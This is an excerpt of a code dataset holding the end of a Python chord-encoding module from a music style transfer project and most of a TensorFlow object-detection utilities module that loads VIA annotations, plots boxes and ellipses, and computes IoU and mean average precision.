Chordino()\n conversion_file_path = chordino.preprocess(self.midi.filepath)\n\n chords = chordino.extract(conversion_file_path)\n self.chords = [(c.chord, c.timestamp) for c in chords]\n\n def generate_encoding(self):\n # One hot encodes all chords in the midi\n self.encoding = np.zeros((self.midi.piano_roll.shape[1], self.num_chords))\n\n for (chord, t1), (chord, t2) in zip(self.chords, self.chords[1:]):\n if chord not in self.vocab:\n self.vocab[chord] = self.num_chords\n self.num_chords += 1\n\n self.encoding = np.hstack(\n (self.encoding, np.zeros((self.encoding.shape[0], 1)))\n )\n\n start = self.midi.time_to_tick(t1)\n end = self.midi.time_to_tick(t2)\n index = self.vocab[chord]\n\n self.encoding[start:end, index] = 1\n\n with open(CHORD_ENCODINGS_PATH, \"w\") as f:\n json.dump([self.num_chords, self.vocab], f)\n", "repo_name": "VikaasVarma/Music-Style-Transfer", "sub_path": "embeddings/style.py", "file_name": "style.py", "file_ext": "py", "file_size_in_byte": 2066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "constants.VAMP_PATH", "line_number": 11, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 12, "usage_type": "call"}, {"api_name": "numba.core.errors.NumbaDeprecationWarning", "line_number": 12, "usage_type": "name"}, {"api_name": "midi.Midi", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 24, "usage_type": "call"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 24, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 25, "usage_type": "argument"}, {"api_name": "json.dump", "line_number": 26, "usage_type": "call"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 28, "usage_type": "argument"}, {"api_name": "json.load", "line_number": 29, "usage_type": "call"}, {"api_name": "os.devnull", "line_number": 32, "usage_type": "attribute"}, {"api_name": "contextlib.redirect_stdout", "line_number": 33, "usage_type": "call"}, {"api_name": "chord_extractor.extractors.Chordino", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 54, "usage_type": "call"}, 
{"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 63, "usage_type": "argument"}, {"api_name": "json.dump", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "22116161809", "text": "import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport json\nfrom six import BytesIO\nfrom PIL import Image\nfrom sklearn.preprocessing import MinMaxScaler\nfrom matplotlib.patches import Ellipse, Rectangle\nfrom object_detection.utils import visualization_utils as viz_utils\n\n\ndef load_json_images_annotations(filename: str, label_dict: dict, subdir: str = \".\"):\n \"\"\"\n Extract the list of images, ground truth annotations, and their corresponding classes from a\n single json annotation file.\n NOTE: this function expects json files created with the VIA (VGG Image Annotator) tool.\n\n :param filename: str\n The name of the input list file\n :param label_dict: dict\n A dictionary with the class names and integer classes (starting with 1) as key-value pairs,\n e.g.: {'apple': 1, 'orange': 2, 'pear': 3}\n :param subdir: str\n The name of the subdirectory containing the images referred to in the annotation file.\n :return: (list of str, list of np.ndarray, list of np.ndarray)\n The lists of images, annotations, and labels.\n \"\"\"\n\n with open(filename) as f:\n annotations = json.load(f)\n\n image_list = []\n box_list = []\n label_list = []\n\n for ii, entry in enumerate(annotations.values()):\n\n image_file = entry['filename']\n image_file = os.path.join(subdir, image_file)\n # print(image_file)\n image_list.append(image_file)\n # get image size:\n with Image.open(image_file) as im:\n img_width, img_height = im.size\n\n boxes = []\n labels = []\n for region in entry['regions']:\n assert region['shape_attributes']['name'] == 'rect'\n # read rectangle parameters:\n x = region['shape_attributes']['x']\n y = region['shape_attributes']['y']\n width = region['shape_attributes']['width']\n height = region['shape_attributes']['height']\n # read class label:\n label = region['region_attributes']['class']\n\n xmin = x / img_width\n ymin = y / img_height\n xmax = (x + width) / img_width\n ymax = (y + height) / img_height\n\n boxes.append([ymin, xmin, ymax, xmax])\n labels.append(label_dict[label])\n\n box_list.append(np.array(boxes, dtype=np.float32))\n label_list.append(np.array(labels, dtype=np.int32))\n\n return image_list, box_list, label_list\n\n\ndef load_json_images_annotations_from_list(filename: str, label_dict: dict, subdir: str = \".\",\n annot_suffix: str = \".json\"):\n \"\"\"\n Extract the list of images, ground truth annotations, and their corresponding classes from a\n list of image files and corresponding json annotation files.\n NOTE: this function expects json files created with the VIA (VGG Image Annotator) tool.\n\n :param filename: str\n The name of the input list file\n :param label_dict: dict\n A dictionary with the class names and integer classes (starting with 1) as key-value pairs,\n e.g.: {'apple': 1, 'orange': 2, 'pear': 3}\n :param subdir: str\n The name of the subdirectory containing the images and the corresponding annotation files.\n :param annot_suffix: str\n The suffix of the annotation files such as: image_file='example.jpeg' -> annotation_file='example'\n :return: (list of str, list of np.ndarray, list of np.ndarray)\n The lists of images, annotations, and labels.\n \"\"\"\n\n with open(filename) as f:\n files = np.loadtxt(f, dtype='str')\n\n image_list = []\n annot_list = []\n label_list = []\n\n for ii, image_file in enumerate(files):\n\n image_list.append(os.path.join(subdir, image_file))\n\n annot_file = image_file.strip('.jpg').strip('.jpeg').strip('.png') + annot_suffix\n with 
open(os.path.join(subdir, annot_file)) as af:\n annotations = json.load(af)\n\n # skip uppermost dict level with only one entry:\n annotations = list(annotations.values())[0]\n\n assert annotations['filename'] == image_file, \"Image filename `{}` differs from annotation file attribute `{}`\" \\\n .format(image_file, annotations['filename'])\n\n annot = []\n labels = []\n for region in annotations['regions']:\n\n assert region['shape_attributes']['name'] == 'rect' or region['shape_attributes']['name'] == 'ellipse'\n\n if region['shape_attributes']['name'] == 'rect':\n # read rectangle parameters:\n x = region['shape_attributes']['x']\n y = region['shape_attributes']['y']\n w = region['shape_attributes']['width']\n h = region['shape_attributes']['height']\n rx = w / 2.\n ry = h / 2.\n cx = x + rx\n cy = y + ry\n theta = 0.\n # read class label:\n label = region['region_attributes']['class']\n\n # overwrite the rectangle entry with an ellipse entry in json:\n region['shape_attributes'] = \\\n {'name': 'ellipse', 'cx': round(cx), 'cy': round(cy), 'rx': rx, 'ry': ry, 'theta': theta}\n\n else:\n # read ellipse parameters:\n cx = region['shape_attributes']['cx']\n cy = region['shape_attributes']['cy']\n rx = region['shape_attributes']['rx']\n ry = region['shape_attributes']['ry']\n theta = region['shape_attributes']['theta']\n # read class label:\n label = region['region_attributes']['class']\n\n annot.append([cx, cy, rx, ry, theta])\n labels.append(label_dict[label])\n\n annot_list.append(np.array(annot, dtype=np.float32))\n label_list.append(np.array(labels, dtype=np.int32))\n\n return image_list, annot_list, label_list\n\n\ndef load_image_into_numpy_array(filename):\n \"\"\"\n Load an image from file into a numpy array of shape\n (height, width, channels), where channels=3 for RGB.\n\n :param filename: str\n Path to the input file.\n :return: numpy.ndarray, uint8\n The array with the input image.\n \"\"\"\n img_data = tf.io.gfile.GFile(filename, 'rb').read()\n image = Image.open(BytesIO(img_data))\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\ndef plot_detections(image_np, boxes, classes, scores, category_index, min_score_thresh=0.8, image_name=None):\n \"\"\"\n Wrapper function for the object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array()\n method.\n\n :param image_np: numpy.ndarray, uint8\n Array with the input image with shape (height, width, 3).\n :param boxes: numpy.ndarray\n Array with the bounding box parameters of shape (n_objects, 4).\n :param classes: numpy.ndarray\n Array with the class labels of shape (n_objects, ).\n Indices must be 1-based, and must match the keys in `category_index`.\n :param scores: numpy.ndarray\n Array with the detection scores. 
If None, groundtruth boxes are assumed,\n and all boxes will be plotted as black with neither classes nor scores.\n :param category_index: dict\n Dictionary of category dictionaries (each holding a category index `id` and category name `name`)\n keyed by category indices.\n :param min_score_thresh: float\n The minimum required score for a box to be shown.\n :param image_name: str\n Name of the output image file.\n \"\"\"\n\n image_np_annotated = image_np.copy()\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated, boxes, classes, scores, category_index,\n use_normalized_coordinates=True, min_score_thresh=min_score_thresh)\n if image_name is not None:\n plt.imsave(image_name, image_np_annotated)\n else:\n plt.imshow(image_np_annotated)\n\n\ndef plot_images_with_boxes(images, gt_boxes, gt_labels,\n pred_boxes, pred_labels, pred_scores,\n category_index, label_id_offset,\n figname='image_list_with_boxes', figformat='jpg',\n min_score_thresh=0.5,\n max_boxes_to_draw=20,\n skip_scores=False, skip_labels=False):\n \"\"\"\n Plot a list / batch of images with the ground truth and\n (optionally) predicted boxes (with labels and scores) overlaid.\n\n :param images: array-like with tf.Tensor elements of shape (height, width, channels)\n OR tf.Tensor with batch dimension of shape (batch_size, height, width, channels)\n The list or batch of image tensors to be plotted.\n :param gt_boxes: array-like with tf.Tensor elements of shape (n_boxes, 4)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, 4)\n The list or batch of ground truth boxes to be plotted.\n :param gt_labels: array-like with tf.Tensor elements of shape (n_boxes, n_classes) or (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, n_classes) or (batch_size, n_boxes)\n The list or batch of ground truth labels.\n :param pred_boxes: array-like with tf.Tensor elements of shape (n_boxes, 4)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, 4)\n OR None\n The list or batch of predicted boxes to be plotted. If None, only the ground truth boxes will be plotted.\n :param pred_labels: array-like with tf.Tensor elements of shape (n_boxes, n_classes) or (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, n_classes) or (batch_size, n_boxes)\n OR None\n The list or batch of predicted labels. If None, only the ground truth boxes will be plotted.\n :param pred_scores: array-like with tf.Tensor elements of shape (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes)\n OR None\n The list or batch of prediction scores. If None, only the ground truth boxes will be plotted.\n :param category_index: dict\n A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n keyed by category indices.\n :param label_id_offset: int\n The offset of label id's with respect to a labelling scheme that starts with 0.\n :param figname: str\n The path and name of the output figure.\n :param figformat: str\n File format of the output figure. Only valid pyplot output formats are allowed.\n :param min_score_thresh: float\n The minimum detection score threshold for a predicted object to be plotted.\n :param max_boxes_to_draw: int OR None\n The maximum number of detection boxes to be plotted. 
If None, draw all boxes.\n :param skip_scores: boolean\n Whether to skip drawing the detection scores.\n :param skip_labels: boolean\n Whether to skip drawing the class labels.\n :return:\n \"\"\"\n\n n_img = len(images)\n image_shape = tf.shape(images[0]).numpy()\n scaler = MinMaxScaler(feature_range=(0, 255))\n\n ncols = 3\n nrows = int(np.ceil(n_img / ncols))\n if nrows == 1:\n ncols = n_img\n fig = plt.figure(figsize=(ncols * 10, 10 * nrows))\n for ii in range(n_img):\n\n plt.subplot(nrows, ncols, ii + 1)\n\n image_np = scaler.fit_transform(images[ii].numpy().reshape(-1, 1)). \\\n reshape(image_shape).astype('int32')\n\n gt_boxes_np = gt_boxes[ii].numpy()\n\n # check if ground truth labels are one-hot encoded:\n if tf.shape(gt_labels[0]).numpy().shape[0] > 1:\n gt_labels_np = tf.argmax(gt_labels[ii], axis=1).numpy().flatten().astype('int32')\n else:\n gt_labels_np = gt_labels[ii].numpy().astype('int32')\n\n image_np_annotated = image_np.copy()\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated, gt_boxes_np, gt_labels_np + label_id_offset, None, category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=max_boxes_to_draw, groundtruth_box_visualization_color='black', line_thickness=1)\n\n if None not in (pred_boxes, pred_labels, pred_scores):\n\n pred_boxes_np = pred_boxes[ii].numpy()\n\n # check if predicted labels are one-hot encoded:\n if tf.shape(pred_labels[0]).numpy().shape[0] > 1:\n pred_labels_np = tf.argmax(pred_labels[ii], axis=1).numpy().flatten().astype('int32')\n else:\n pred_labels_np = pred_labels[ii].numpy().astype('int32')\n\n pred_scores_np = pred_scores[ii].numpy()\n\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated, pred_boxes_np, pred_labels_np + label_id_offset, pred_scores_np, category_index,\n use_normalized_coordinates=True, min_score_thresh=min_score_thresh,\n max_boxes_to_draw=max_boxes_to_draw, line_thickness=1,\n skip_scores=skip_scores, skip_labels=skip_labels)\n\n plt.imshow(image_np_annotated)\n\n plt.tight_layout()\n plt.savefig(figname + '.' + figformat, format=figformat)\n fig.clf()\n plt.close(fig)\n del fig\n\n\ndef plot_image_batch_with_boxes(dataset,\n category_index,\n label_id_offset,\n rescale: bool = True,\n figname: str = 'image_batch_with_boxes',\n figformat: str = 'jpg'):\n \"\"\"\n Plots a batch of images with their corresponding object bounding boxes and labels.\n\n :param dataset: tf.Dataset\n A batched tensorflow dataset object containing the entries:\n image, image shape, boxes, labels\n :param category_index: dict\n A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n keyed by category indices.\n :param label_id_offset: int\n The offset of label id's with respect to a labelling scheme that starts with 0.\n :param rescale: bool\n Whether to rescale the image into the [0, 255] range.\n :param figname: str\n The filename for the output figure.\n :param figformat: str\n The format of the output figure. 
Valid matplotlib.pyplot formats are accepted.\n \"\"\"\n\n image_list_np = []\n boxes_list = []\n labels_list = []\n\n if rescale:\n scaler = MinMaxScaler(feature_range=(0, 255))\n else:\n scaler = None\n\n for img, img_shape, boxes, labels in dataset.unbatch():\n\n if scaler is not None:\n image_list_np.append(scaler.fit_transform(img.numpy().reshape(-1, 1)).reshape(img.shape).astype('int32'))\n else:\n image_list_np.append(img.numpy())\n boxes_list.append(boxes.numpy())\n labels_list.append(tf.argmax(labels.to_tensor(), axis=1).numpy().flatten().astype('int32'))\n\n n_img = len(image_list_np)\n\n ncols = 3\n nrows = int(np.ceil(n_img / ncols))\n fig = plt.figure(figsize=(30, 10 * nrows))\n\n for ii in range(n_img):\n\n plt.subplot(nrows, ncols, ii + 1)\n\n image_np_annotated = image_list_np[ii].copy()\n\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated,\n boxes_list[ii],\n labels_list[ii] + label_id_offset,\n np.ones([boxes_list[ii].shape[0]]),\n category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=None,\n groundtruth_box_visualization_color='black',\n skip_scores=True,\n skip_labels=False,\n line_thickness=2)\n\n plt.imshow(image_np_annotated)\n\n plt.tight_layout()\n plt.savefig(figname + '.' + figformat, format=figformat)\n fig.clf()\n plt.close(fig)\n del fig\n\n\ndef plot_image_batch_with_ellipses(data_batch, category_index, ell2box=False, rescale=True,\n figname='image_batch_with_ellipses', figformat='pdf'):\n \"\"\"\n Plots a batch of images with their corresponding object annotation ellipses and labels.\n\n :param data_batch: tf.Dataset\n A batched tensorflow dataset object containing the entries:\n image, image shape, ellipses, labels\n :param category_index: dict\n A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n keyed by category indices.\n :param ell2box: bool\n Whether to also plot the bounding rectangles of the ellipses.\n :param rescale: bool\n Whether to rescale the image into the [0, 255] range.\n :param figname: str\n The filename for the output figure.\n :param figformat: str\n The format of the output figure. 
Valid matplotlib.pyplot formats are accepted.\n \"\"\"\n image_list_np = []\n shapes_list = []\n ellipse_list = []\n box_list = []\n labels_list = []\n\n if rescale:\n scaler = MinMaxScaler(feature_range=(0, 255))\n else:\n scaler = None\n\n for img, img_shape, ellipses, labels in data_batch.unbatch():\n # image_list_np.append(img.numpy().astype('int32'))\n if scaler is not None:\n image_list_np.append(scaler.fit_transform(img.numpy().reshape(-1, 1)).reshape(img.shape).astype('int32'))\n else:\n image_list_np.append(img.numpy())\n # print(img_shape)\n shapes_list.append(img_shape.numpy().astype('int32'))\n ellipse_list.append(ellipses.numpy())\n labels_list.append(labels.numpy().astype('int32'))\n if ell2box:\n ellipses = ellipses.to_tensor()\n boxes = bounding_rectagle(ellipses)\n box_list.append(boxes.numpy())\n\n for ii, image_np in enumerate(image_list_np):\n\n dpi = 400\n\n fig = plt.figure(figsize=(20, 10), dpi=dpi, tight_layout=True)\n ax = fig.add_subplot(1, 1, 1)\n _ = ax.imshow(image_np, aspect=1, interpolation='none')\n\n plt.rcParams[\"figure.autolayout\"] = True\n\n # plt.subplot(nrows, ncols, ii + 1)\n plot_gt_ellipses(ax, ellipse_list[ii], labels_list[ii], category_index, np.ones_like(ellipse_list[ii]))\n if box_list:\n plot_gt_boxes(ax, box_list[ii], labels_list[ii], category_index, np.ones_like(ellipse_list[ii]))\n\n cy = int(image_np.shape[0] // 2)\n cx = int(image_np.shape[1] // 2)\n\n # print(shapes_list[ii], cy, cx)\n plot_bb(ax, cx, cy, shapes_list[ii])\n # print(annot_list[ii])\n # print(labels_list[ii])\n\n if figname is not None:\n plt.savefig(figname + '_' + str(ii + 1) + '.' + figformat, format=figformat, dpi=dpi)\n else:\n plt.show()\n\n\ndef plot_bb(axis, cx, cy, shape):\n height, width, channels = shape\n\n rr = Rectangle(xy=(cx - width / 2, cy - height / 2), width=width, height=height)\n axis.add_artist(rr)\n rr.set_clip_box(axis.bbox)\n rr.set_color('green')\n rr.set_alpha(1)\n rr.set_linewidth(4)\n rr.set_fill(False)\n\n\ndef bounding_rectagle(ellipse_parameters):\n \"\"\"\n Compute the parameters of the bounding rectangles for a set of ellipses.\n\n :param ellipse_parameters: tf.Tensor\n Tensor of shape (n_objects, 5) with the ellipse parameters:\n x_center, y_center, x_radius, y_radius, rotation angle.\n :return: tf.Tensor\n Tensor of shape (n_objects, 4) with the resulting bounding box parameters:\n ymin, xmin, ymax, xmax\n \"\"\"\n cx = ellipse_parameters[:, 0]\n cy = ellipse_parameters[:, 1]\n rx = ellipse_parameters[:, 2]\n ry = ellipse_parameters[:, 3]\n theta = ellipse_parameters[:, 4]\n\n pi = tf.constant(np.pi)\n epsilon = 1e-10\n\n tx1 = tf.atan(-1 * (ry * tf.sin(theta)) / (rx * tf.cos(theta) + epsilon))\n tx2 = tx1 + pi\n # print(tx1, tx2)\n\n x1 = rx * tf.cos(theta) * tf.cos(tx1) - ry * tf.sin(theta) * tf.sin(tx1)\n x2 = rx * tf.cos(theta) * tf.cos(tx2) - ry * tf.sin(theta) * tf.sin(tx2)\n # print(x1, x2)\n\n # ty1 = np.arctan((ry * tf.cos(theta)) / (rx * tf.sin(theta) + epsilon))\n ty1 = tf.atan((ry * tf.cos(theta)) / (rx * tf.sin(theta) + epsilon))\n ty2 = ty1 + pi\n # print(ty1, ty2)\n\n y1 = rx * tf.sin(theta) * tf.cos(ty1) + ry * tf.cos(theta) * tf.sin(ty1)\n y2 = rx * tf.sin(theta) * tf.cos(ty2) + ry * tf.cos(theta) * tf.sin(ty2)\n # print(y1, y2)\n\n half_width = tf.reduce_max(tf.stack((x1, x2), axis=0), axis=0)\n half_height = tf.reduce_max(tf.stack((y1, y2), axis=0), axis=0)\n # tf.print(half_width)\n # tf.print(half_width.shape)\n\n ymin = cy - half_height\n xmin = cx - half_width\n ymax = cy + half_height\n xmax = cx + half_width\n\n 
rectangle_params = tf.stack((ymin, xmin, ymax, xmax), axis=1)\n\n return rectangle_params\n\n\ndef plot_gt_ellipses(axis, ellipses, classes, category_index, scores):\n\n for i, annot in enumerate(ellipses):\n cx, cy, rx, ry, theta = annot\n\n ell = Ellipse(xy=(cx, cy), width=2 * rx, height=2 * ry, angle=theta * 180.0 / np.pi, zorder=i + 2)\n axis.add_artist(ell)\n ell.set_clip_box(axis.bbox)\n ell.set_color('black')\n ell.set_alpha(1)\n ell.set_linewidth(0.2)\n ell.set_fill(False)\n\n\ndef plot_gt_boxes(axis, boxes, classes, category_index, scores):\n\n for i, annot in enumerate(boxes):\n ymin, xmin, ymax, xmax = annot\n\n rr = Rectangle(xy=(xmin, ymin), width=xmax - xmin, height=ymax - ymin)\n axis.add_artist(rr)\n rr.set_clip_box(axis.bbox)\n rr.set_color('blue')\n rr.set_alpha(1)\n rr.set_linewidth(0.2)\n rr.set_fill(False)\n\n\ndef get_lists_from_batch(data_batch):\n # Unpack the ragged tensors of this batch.\n # The first dimension of each ragged tensor is the batch size.\n images_batch_rtensor, gt_boxes_rtensor, gt_classes_rtensor = data_batch\n\n # Convert the ragged tensors of this batch to lists of tensors:\n images_list = tf.split(images_batch_rtensor, images_batch_rtensor.shape[0], axis=0)\n images_list = [tf.squeeze(item.to_tensor(), axis=0) for item in images_list]\n\n gt_boxes_list = tf.split(gt_boxes_rtensor, gt_boxes_rtensor.shape[0], axis=0)\n gt_boxes_list = [tf.squeeze(item.to_tensor(), axis=0) for item in gt_boxes_list]\n\n gt_classes_list = tf.split(gt_classes_rtensor, gt_classes_rtensor.shape[0], axis=0)\n gt_classes_list = [tf.squeeze(item.to_tensor(), axis=0) for item in gt_classes_list]\n\n return images_list, gt_boxes_list, gt_classes_list\n\n\ndef get_list_from_ragged_batch(data_batch):\n # Convert the ragged tensors of this batch to lists of tensors:\n tensor_list = tf.split(data_batch, data_batch.shape[0], axis=0)\n tensor_list = [tf.squeeze(item.to_tensor(), axis=0) for item in tensor_list]\n\n return tensor_list\n\n\ndef get_list_from_batch(data_batch):\n # Convert the ragged tensors of this batch to lists of tensors:\n tensor_list = tf.split(data_batch, data_batch.shape[0], axis=0)\n tensor_list = [tf.squeeze(item, axis=0) for item in tensor_list]\n\n return tensor_list\n\n\n@tf.function()\ndef compute_iou_matrix(box_arr1, box_arr2):\n \"\"\"\n Compute the IOU matrix for two sets of bounding boxes.\n\n :param box_arr1: tf.Tensor\n Tensor of shape (n_objects, 4) with the first set of bounding box parameters.\n :param box_arr2: tf.Tensor\n Tensor of shape (n_objects, 4) with the second set of bounding box parameters.\n :return: tf.Tensor\n The resulting IOU matrix.\n \"\"\"\n\n epsilon = tf.constant(1e-9, dtype='float32')\n\n x11, y11, x12, y12 = tf.split(box_arr1, 4, axis=1)\n x21, y21, x22, y22 = tf.split(box_arr2, 4, axis=1)\n\n xA = tf.maximum(x11, tf.transpose(x21))\n yA = tf.maximum(y11, tf.transpose(y21))\n xB = tf.minimum(x12, tf.transpose(x22))\n yB = tf.minimum(y12, tf.transpose(y22))\n\n interArea = tf.maximum((xB - xA + epsilon), 0) * tf.maximum((yB - yA + epsilon), 0)\n boxAArea = (x12 - x11 + epsilon) * (y12 - y11 + epsilon)\n boxBArea = (x22 - x21 + epsilon) * (y22 - y21 + epsilon)\n\n iou_matrix = interArea / (boxAArea + tf.transpose(boxBArea) - interArea)\n\n return iou_matrix\n\n\n@tf.function()\ndef compute_map_iou_per_image(gt_boxes_tensor, gt_labels_tensor, pred_boxes_tensor, pred_labels_tensor,\n pred_boxes_scores,\n iou_threshold=0.5, n_scores=100):\n \"\"\"\n Compute the mean average precision (mAP) and the mean IOU for an image. 
The mean is taken across all classes,\n and in case of the mean IOU, across all score thresholds for each class.\n :param gt_boxes_tensor: tf.Tensor, shape=(n_boxes,4), dtype=float32\n A tensor with the ground truth boxes holding (ymin, xmin, ymax, xmax) values for each box in\n relative coordinates in [0,1].\n :param gt_labels_tensor: tf.Tensor, shape=(n_boxes,), dtype=int32\n A tensor with the ground truth class labels (starting from 0).\n :param pred_boxes_tensor: tf.Tensor, shape=(n_boxes,4), dtype=float32\n A tensor with the predicted boxes holding (ymin, xmin, ymax, xmax) values for each box in\n relative coordinates in [0,1].\n :param pred_labels_tensor: tf.Tensor, shape=(n_boxes,), dtype=int32\n A tensor with the predicted class labels (starting from 0).\n :param pred_boxes_scores: tf.Tensor, shape=(n_boxes,), dtype=float32\n A tensor with the probability scores (of the predicted class) of the predicted boxes.\n :param iou_threshold: float\n Threshold of the IOU metric in the computation of the mean average precision (mAP).\n :param n_scores: int\n The number of score thresholds for sampling the precision-recall curve.\n :return: (tf.Tensor, tf.Tensor, tf.Tensor)\n The mean average precision (across classes), the mean IOU (across scores and classes), and the per-class detection scores at maximum F1.\n \"\"\"\n epsilon = tf.constant(1e-10)\n\n classes = tf.unique(gt_labels_tensor).y # determine the unique classes present in current image, ...\n num_cl = tf.shape(classes)[0] # ... and count them\n\n # initialize tensor array for aggregating each average precision value per class\n average_precisions = tf.TensorArray(tf.float32, size=num_cl, dynamic_size=False, clear_after_read=True)\n scores_maxf1 = tf.TensorArray(tf.float32, size=0, dynamic_size=True, clear_after_read=True)\n mean_ious = tf.TensorArray(tf.float32, size=num_cl, dynamic_size=False, clear_after_read=True)\n\n # loop over the classes present in the current image:\n for jj in tf.range(num_cl):\n\n i_class = classes[jj]\n\n # initialize tensor arrays for aggregating the precisions and recalls for each score threshold:\n precisions = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n recalls = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n ious = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n f1scores = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n\n # get the ground truth boxes corresponding to the current (i_class) class:\n index_gt_class = \\\n tf.squeeze(tf.where(\n tf.equal(gt_labels_tensor, i_class)\n ), axis=1)\n gt_boxes_tensor_class = tf.reshape(tf.gather(gt_boxes_tensor, index_gt_class), shape=(-1, 4))\n\n # get the scores corresponding to the current (i_class) class:\n pred_boxes_scores_class = tf.gather(pred_boxes_scores,\n tf.squeeze(tf.where(tf.equal(pred_labels_tensor, i_class))))\n # determine max score for current class:\n max_score_class = tf.reduce_max(pred_boxes_scores_class)\n # create score grid for current class for sampling the precision-recall curve:\n scores = tf.cast(tf.linspace(0.0, max_score_class, n_scores), dtype='float32')\n # NOTE: the number of true positives for a score threshold above the maximum score will be zero,\n # therefore the precision will be undefined. For such cases, the precision vs recall curve takes the constant\n # value of precision=1 at all recalls by definition. 
We account for this by setting the upper limit for\n # the score grid to max(score) for the class, and by adding the last precision recall point at the end of\n # the loop below:\n\n # for i_score, score in enumerate(scores[:-1]):\n for i_score in tf.range(n_scores - 1):\n score = scores[i_score]\n\n # get the predicted boxes corresponding to the current (i_class) class:\n index_pred_class = \\\n tf.squeeze(tf.where(\n tf.logical_and(tf.equal(pred_labels_tensor, i_class),\n tf.greater_equal(pred_boxes_scores, score))\n ), axis=1)\n pred_boxes_tensor_class = tf.gather(pred_boxes_tensor, index_pred_class)\n\n # Compute IOU matrix: rows correspond to gt boxes, columns to predicted boxes of current class:\n iou_matrix_class = compute_iou_matrix(gt_boxes_tensor_class, pred_boxes_tensor_class)\n\n mean_iou_boxes = tf.reduce_mean(tf.reduce_max(iou_matrix_class, axis=1))\n\n # Compute the number of true positives for this class:\n # count the rows in `iou_matrix_class` that have (at least) one iou > iou_threshold column\n tp = tf.reduce_sum(tf.cast(\n tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1),\n dtype='float32'))\n\n # Compute the number of false negatives for this class:\n # count the rows in `iou_matrix_class` that do not have any iou > iou_threshold column\n fn = tf.reduce_sum(tf.cast(\n tf.logical_not(tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1)),\n dtype='float32'))\n\n # Compute the number of false positives for this class:\n # count the columns in `iou_matrix_class` that do not have any iou > iou_threshold row\n fp1 = tf.reduce_sum(tf.cast(\n tf.logical_not(tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=0)),\n dtype='float32'))\n # for each row in `iou_matrix_class`, count all redundant iou > iou_threshold columns\n # get a boolean mask for the rows with at least one detection\n mask = tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1)\n # get a subset of the iou matrix with the above boolean mask\n iou_matrix_class_detections = tf.boolean_mask(iou_matrix_class, mask)\n # count all redundant detections\n fp2 = tf.reduce_sum(tf.reduce_sum(tf.cast(tf.greater_equal(iou_matrix_class_detections, iou_threshold),\n dtype='float32'), axis=1) - 1)\n\n fp = fp1 + fp2\n\n precision = tp / (tp + fp + epsilon)\n recall = tp / (tp + fn + epsilon)\n\n f1score = 2 * precision * recall / (precision + recall + epsilon)\n\n recalls = recalls.write(i_score, recall)\n precisions = precisions.write(i_score, precision)\n f1scores = f1scores.write(i_score, f1score)\n ious = ious.write(i_score, mean_iou_boxes)\n\n recalls = recalls.write(n_scores - 1, 0)\n precisions = precisions.write(n_scores - 1, 1)\n f1scores = f1scores.write(n_scores - 1, 0)\n\n recalls = recalls.stack()\n precisions = precisions.stack()\n mean_iou_class = tf.reduce_mean(ious.stack())\n mean_ious = mean_ious.write(jj, mean_iou_class)\n\n # compute AP without interpolation:\n average_precision = tf.abs(-tf.reduce_sum(tf.experimental.numpy.diff(recalls) * precisions[:-1]))\n average_precisions = average_precisions.write(jj, average_precision)\n\n # compute detection score at maximum f1score:\n f1scores = f1scores.stack()\n argmax_f1scores = tf.argmax(f1scores)\n score_maxf1 = tf.gather(scores, argmax_f1scores)\n # save detection score at maximum f1score for each class only if it is non-zero:\n if tf.greater(score_maxf1, 0.):\n scores_maxf1 = scores_maxf1.write(jj, tf.stack([tf.cast(i_class, dtype=tf.float32), score_maxf1], axis=0))\n\n 
